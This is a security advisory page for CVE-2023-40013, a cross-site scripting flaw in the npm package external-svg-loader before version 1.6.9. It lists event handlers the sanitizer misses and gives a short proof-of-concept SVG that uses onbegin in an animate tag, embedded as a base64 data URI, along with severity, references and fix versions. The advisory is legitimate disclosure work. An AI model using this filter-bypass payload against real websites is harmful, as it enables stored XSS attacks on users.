Ecosyste.ms: Advisories
An open API service providing security vulnerability metadata for many open source software ecosystems.
Security Advisories: GSA_kwCzR0hTQS14YzJyLWpmMngtZ2pyOM4AA1Sy
external-svg-loader Cross-site Scripting vulnerability
Summary
According to the docs, svg-loader will strip all JS code before injecting the SVG file for security reasons but the input sanitization logic is not sufficient and can be trivially bypassed. This allows an attacker to craft a malicious SVG which can result in XSS.
Details
When trying to sanitize the svg the lib removes event attributes such as onmouseover, onclick but the list of events is not exhaustive. Here's a list of events not removed by svg-loader.
onafterscriptexecute, onbeforecopy, onbeforecut, onbeforescriptexecute, onbeforetoggle, onbegin, onbounce, onend, onfinish, onfocusin, onfocusout, onmousewheel, onpointerrawupdate, onrepeat, onsearch, onshow, onstart, ontoggle(popover), ontouchend, ontouchmove, ontouchstart
As you can see in the POC we can use onbegin in animate tag to execute JS code without needing to add data-js="enabled".
PoC
<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
<animate onbegin=alert(1) attributeName=x dur=1s>
</svg>
<html>
<head>
<script src="./dist/svg-loader.js" type="text/javascript"></script>
</head>
<body>
<svg data-src="data:image/svg+xml;base64,PHN2ZyB2ZXJzaW9uPSIxLjEiIGJhc2VQcm9maWxlPSJmdWxsIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcvMjAwMC9zdmciPgogIDxwb2x5Z29uIGlkPSJ0cmlhbmdsZSIgcG9pbnRzPSIwLDAgMCw1MCA1MCwwIiBmaWxsPSIjMDA5OTAwIiBzdHJva2U9IiMwMDQ0MDAiLz4KICA8YW5pbWF0ZSBvbmJlZ2luPWFsZXJ0KDEpIGF0dHJpYnV0ZU5hbWU9eCBkdXI9MXM+Cjwvc3ZnPgo="></svg>
</body>
</html>
Impact
Any website which uses external-svg-loader and allows its users to provide svg src, upload svg files would be susceptible to stored XSS attack.
Permalink: https://github.com/advisories/GHSA-xc2r-jf2x-gjr8JSON: https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS14YzJyLWpmMngtZ2pyOM4AA1Sy
Source: GitHub Advisory Database
Origin: Unspecified
Severity: Critical
Classification: General
Published: 9 months ago
Updated: 6 months ago
CVSS Score: 9.8
CVSS vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
Identifiers: GHSA-xc2r-jf2x-gjr8, CVE-2023-40013
References:
- https://github.com/shubhamjain/svg-loader/security/advisories/GHSA-xc2r-jf2x-gjr8
- https://nvd.nist.gov/vuln/detail/CVE-2023-40013
- https://github.com/shubhamjain/svg-loader/commit/d3562fc08497aec5f33eb82017fa1417b3319e2c
- https://github.com/shubhamjain/svg-loader/blob/main/svg-loader.js#L125-L128
- https://github.com/shubhamjain/svg-loader/tree/main#2-enable-javascript
- https://github.com/advisories/GHSA-xc2r-jf2x-gjr8
Blast Radius: 15.1
Affected Packages
npm:external-svg-loader
Dependent packages: 18Dependent repositories: 35
Downloads: 54,242 last month
Affected Version Ranges: < 1.6.9
Fixed in: 1.6.9
All affected versions: 0.0.1, 0.0.2, 0.0.3, 0.0.4, 0.0.5, 0.0.6, 0.0.7, 0.0.8, 0.0.9, 0.0.10, 1.0.0, 1.1.0, 1.2.0, 1.2.1, 1.2.2, 1.3.0, 1.3.1, 1.3.2, 1.3.3, 1.3.4, 1.4.0, 1.4.1, 1.4.2, 1.5.0, 1.5.1, 1.5.2, 1.6.0, 1.6.1, 1.6.2, 1.6.3, 1.6.4, 1.6.5, 1.6.6, 1.6.7, 1.6.8
All unaffected versions: 1.6.9, 1.6.10, 1.7.0, 1.7.1